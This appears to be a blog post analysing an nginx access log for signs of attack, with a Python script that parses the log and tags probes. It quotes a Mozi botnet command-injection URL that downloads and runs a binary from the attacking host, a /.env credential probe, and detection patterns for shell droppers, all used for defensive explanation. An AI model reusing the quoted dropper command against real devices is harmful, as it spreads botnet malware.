vulnerability scanning techniques


/var/log/nginx/access.log

The nginx access log doesn't show anything too wildly interesting, but let's go through some of the entries from around that time. Most requests appear twice because the first attempt gets a 301 redirect (most likely to HTTPS or the canonical hostname) and the client then repeats it:

35.222.157.169 - - [25/Sep/2020:21:08:38 +0000] "GET /robots.txt HTTP/1.1" 301 194 "-" "shopify-partner-homepage-scraper"
35.222.157.169 - - [25/Sep/2020:21:08:39 +0000] "GET /robots.txt HTTP/1.1" 200 22 "-" "shopify-partner-homepage-scraper"
35.222.157.169 - - [25/Sep/2020:21:08:39 +0000] "GET / HTTP/1.1" 301 194 "-" "shopify-partner-homepage-scraper"
35.222.157.169 - - [25/Sep/2020:21:08:40 +0000] "GET / HTTP/1.1" 200 527 "-" "shopify-partner-homepage-scraper"

shopify-partner-homepage-scraper seems innocuous enough, though information about it is scant at best. If I put my opsec tinfoil hat on: the first step anyone trying to break into a web server takes is information gathering, and a crawler that starts with robots.txt (which routinely lists the paths an owner would rather keep out of search engines) and then fetches the front page is doing exactly that. Scraping for files containing usernames, or for anything relating to third-party applications such as Shopify, would turn up possible intrusion vectors.

But that's really just the tinfoil hat talking. As this server log for ysolutions.at shows, shopify-partner-homepage-scraper accounts for 1.34% of their total traffic, so a Shopify bot randomly trawling the internet for Shopify storefronts is the likelier explanation. The entry is still noteworthy.

83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "GET / HTTP/1.1" 301 194 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "GET / HTTP/1.1" 200 527 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /favicon.ico HTTP/1.1" 301 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /favicon.ico HTTP/1.1" 404 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /apple-touch-icon.png HTTP/1.1" 301 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /apple-touch-icon.png HTTP/1.1" 405 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /apple-touch-icon-precomposed.png HTTP/1.1" 301 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
83.135.136.179 - - [25/Sep/2020:21:49:57 +0000] "HEAD /apple-touch-icon-precomposed.png HTTP/1.1" 405 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"

The above entries are strange: they occurred exactly at the time of the IP attack. The User-Agent is Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0, that is, the Reeder feed-reader app talking through Apple's CFNetwork framework on a Darwin 20.0.0 kernel. Darwin 20.0.0 (June 22, 2020) is the kernel of macOS 11.0 Big Sur beta 1 and iOS 14.0 beta 1. This is neither the version running on my MacBook, iPad, or iPhone.

The paths it probed (favicon.ico, apple-touch-icon.png and apple-touch-icon-precomposed.png) are the icons iOS uses when a site is added to the home screen, so at first glance this looks like a scan aimed at the iOS home screen, and I haven't added either of these sites to my iOS home screen. The caveat a log reader should keep in mind: those three HEAD requests, in exactly that order, are how browsers and feed readers such as Reeder look for a site icon after loading the front page, and the 301 followed by a 404 or 405 is just the redirect target answering that the file does not exist or that it does not accept HEAD. The request pattern on its own is not evidence of an exploit attempt; what makes these entries worth a closer look is the timing.

66.42.42.3 - - [25/Sep/2020:21:53:34 +0000] "GET /.env HTTP/1.1" 401 606 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
66.42.42.3 - - [25/Sep/2020:21:53:35 +0000] "POST / HTTP/1.1" 401 606 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"

A GET for /.env is a classic credential-harvesting probe. The .env file is the dotenv configuration file that frameworks such as Laravel and many Node and Python projects read at startup, and it typically holds database passwords, API keys and application secrets. It has nothing to do with the shell environment of my home directory: the scanner is betting that the file sits inside the web root and that the server will hand it over as a static file. Both this request and the POST / that follows it got a 401, so the host's filter blocked them. The check worth making on any nginx box is that requests for dotfiles are refused (a location block matching paths that begin with /. and returning 404) and that no .env ever lives under the document root.

172.105.89.161 - - [25/Sep/2020:22:02:46 +0000] "POST /ajax HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36"

Here we have an obvious spam-abuse entry: a bot blindly POSTing to /ajax, an endpoint this site does not have (hence the 404), from an IP address known as a spam source.

119.185.231.105 - - [25/Sep/2020:22:04:06 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.185.231.105:56819/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 178 "-" "Hello, world"

This one is a command-injection payload delivered through a GET request. The string after /shell? is a shell one-liner, with + standing for spaces: cd /tmp; rm -rf *; wget http://119.185.231.105:56819/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws. It wipes /tmp, downloads a binary named Mozi.a from the attacking host itself (the same 119.185.231.105, on a high port), makes it executable and runs it. Mozi is a peer-to-peer IoT botnet built from Mirai and Gafgyt code, and this exact URL, with the trailing jaws argument and the "Hello, world" User-Agent, is its exploit for the /shell endpoint of JAWS-based DVR web servers; infected devices spray it at every address they can reach, which is why the payload is served from the attacker's own IP. The rm -rf only touches /tmp, and on an nginx host the request simply 404s, so nothing ran here. It could be entries like this one that triggered my webhost to filter the requests.

47.92.204.164 - - [25/Sep/2020:22:07:30 +0000] "GET / HTTP/1.0" 200 6289 "-" "-"
47.92.204.164 - - [25/Sep/2020:22:07:37 +0000] "GET /nmaplowercheck1601071656 HTTP/1.1" 400 280 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
47.92.204.164 - - [25/Sep/2020:22:07:37 +0000] "GET / HTTP/1.0" 400 280 "-" "-"
47.92.204.164 - - [25/Sep/2020:22:07:38 +0000] "GET / HTTP/1.1" 200 6289 "-" "-"
47.92.204.164 - - [25/Sep/2020:22:07:51 +0000] "GET / HTTP/1.1" 200 2130 "-" "-"

Here we have a host scanning me with Nmap. The bare GET / HTTP/1.0 requests with no User-Agent are the service and version detection probes, and the /nmaplowercheck1601071656 request is what Nmap's http NSE scripts send to learn how the server answers for a page that cannot exist, so they can tell a real 200 from a catch-all response; the number is the Unix time of the scan (1601071656 is 25 Sep 2020 22:07:36 UTC, matching the log), and the User-Agent says outright what it is. The address is an abusive Chinese IP.


So the next logical question, before I can tell whether I'm under attack, is how common these requests are. My access logs only go back 12 days:

The nginx access logs do not show anything too suspicious, apart from 83.135.136.179.
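Answering "how common are these probes" and "who was on the site in the minutes around the incident" is a job for a small log-triage script rather than for eyeballing. The following is an added example written for this page, not code from the original post: it parses nginx combined-format lines, tags the probe types discussed above (the /.env fetch, the Mozi command-injection URL, the Nmap NSE check, the icon HEAD requests), and aggregates hits, time span, status codes and tags per source IP. The signature rules and tag names are my own; the sample lines are copied from the excerpts above plus two constructed ones (a TLS ClientHello sent to the plaintext port and a line truncated by log rotation) to show how the parser copes with them, and the incident time used for the window is an assumption.

```python
import re
from collections import Counter
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# nginx "combined" log format:
# $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Probe signatures for the request types seen in the post (my own rule set, extend as needed).
# Path rules run on the URL-decoded path and the first match wins; UA rules are substring matches.
PATH_RULES = [
    ("dotenv-probe",      re.compile(r"^/\.env(?:\.|$)")),              # /.env, /.env.bak, ...
    ("dotfile-probe",     re.compile(r"^/\.")),                           # /.git/config and friends
    ("command-injection", re.compile(r"[;|`]|\b(?:wget|curl|chmod)\s")),  # shell metacharacters, droppers
    ("nmap-nse",          re.compile(r"^/nmaplowercheck\d+$")),           # Nmap http NSE catch-all check
]
UA_RULES = [
    ("nmap-nse", "Nmap Scripting Engine"),
    ("mozi-ua",  "Hello, world"),   # User-Agent on the Mozi/JAWS dropper request
]
# Icon lookups: what browsers and feed readers do on their own; benign by themselves.
ICON_PATHS = {"/favicon.ico", "/apple-touch-icon.png", "/apple-touch-icon-precomposed.png"}


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it is not one."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["time"] = datetime.strptime(e["time"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    parts = e["request"].split(" ")
    if len(parts) == 3:
        e["method"], e["path"], e["proto"] = parts
    else:  # not an HTTP request line (e.g. a TLS handshake sent to the plaintext port)
        e["method"], e["path"], e["proto"] = None, e["request"], None
    return e


def classify(e):
    """Return the probe tags for one parsed entry; an empty list means nothing was flagged."""
    tags = []
    decoded = unquote_plus(e["path"])
    for tag, rx in PATH_RULES:
        if rx.search(decoded):
            tags.append(tag)
            break
    for tag, needle in UA_RULES:
        if needle in e["ua"] and tag not in tags:
            tags.append(tag)
    if e["method"] == "HEAD" and e["path"] in ICON_PATHS:
        tags.append("icon-lookup")
    return tags


def load(lines):
    """Parse every line; return (entries, number of lines that did not match the format)."""
    parsed = [parse_line(line) for line in lines]
    return [e for e in parsed if e], parsed.count(None)


def per_ip_summary(entries):
    """Aggregate hits, time span, status codes and probe tags per source address."""
    out = {}
    for e in entries:
        s = out.setdefault(e["ip"], {"hits": 0, "first": e["time"], "last": e["time"],
                                     "statuses": Counter(), "tags": Counter()})
        s["hits"] += 1
        s["first"], s["last"] = min(s["first"], e["time"]), max(s["last"], e["time"])
        s["statuses"][e["status"]] += 1
        s["tags"].update(classify(e))
    return out


def hits_near(entries, when, minutes=5):
    """Entries within +/- minutes of a moment: who was on the site when the incident happened."""
    return [e for e in entries if abs(e["time"] - when) <= timedelta(minutes=minutes)]


# Sample input: nine lines copied from the post's log excerpts plus two constructed ones
# (a TLS ClientHello hitting port 80, and a line truncated mid-write by log rotation).
SAMPLE_LOG = r"""
35.222.157.169 - - [25/Sep/2020:21:08:39 +0000] "GET /robots.txt HTTP/1.1" 200 22 "-" "shopify-partner-homepage-scraper"
83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "GET / HTTP/1.1" 200 527 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /favicon.ico HTTP/1.1" 404 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /apple-touch-icon.png HTTP/1.1" 405 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
66.42.42.3 - - [25/Sep/2020:21:53:34 +0000] "GET /.env HTTP/1.1" 401 606 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
66.42.42.3 - - [25/Sep/2020:21:53:35 +0000] "POST / HTTP/1.1" 401 606 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
119.185.231.105 - - [25/Sep/2020:22:04:06 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.185.231.105:56819/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 178 "-" "Hello, world"
47.92.204.164 - - [25/Sep/2020:22:07:30 +0000] "GET / HTTP/1.0" 200 6289 "-" "-"
47.92.204.164 - - [25/Sep/2020:22:07:37 +0000] "GET /nmaplowercheck1601071656 HTTP/1.1" 400 280 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
198.51.100.7 - - [25/Sep/2020:22:10:00 +0000] "\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03" 400 157 "-" "-"
47.92.204.164 - - [25/Sep/2020:22:07:51 +0000] "GET / HTTP/1.1" 200
""".strip().splitlines()

if __name__ == "__main__":
    entries, bad = load(SAMPLE_LOG)
    print(f"{len(entries)} entries parsed, {bad} unparsable")
    for ip, s in sorted(per_ip_summary(entries).items(), key=lambda kv: -kv[1]["hits"]):
        print(f"{ip:16} hits={s['hits']} {s['first']:%H:%M:%S}-{s['last']:%H:%M:%S} "
              f"status={dict(s['statuses'])} tags={dict(s['tags'])}")
    # Assumed incident time (the post only says the Reeder requests coincided with it).
    incident = datetime.strptime("25/Sep/2020:21:50:00 +0000", "%d/%b/%Y:%H:%M:%S %z")
    print("seen around the incident:", sorted({e["ip"] for e in hits_near(entries, incident)}))
```

Run it against a real file with load(open("/var/log/nginx/access.log")) and widen the window as needed; the per-IP table answers the frequency question directly, and the untagged entries with a normal status mix are the background noise you can ignore. First-match on the path rules is deliberate: a /.env hit should read as a credential probe, not as a generic dotfile, and the UA rules add a tag only when the path did not already supply it.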

I'm having a hard time tuning into any signal; most of it looks like noise. So I'll have to focus on the address that accessed my site at the exact time of the attack: 83.135.136.179. The IP belongs to 1&1 Versatel Deutschland GmbH, whose headquarters are in Berlin.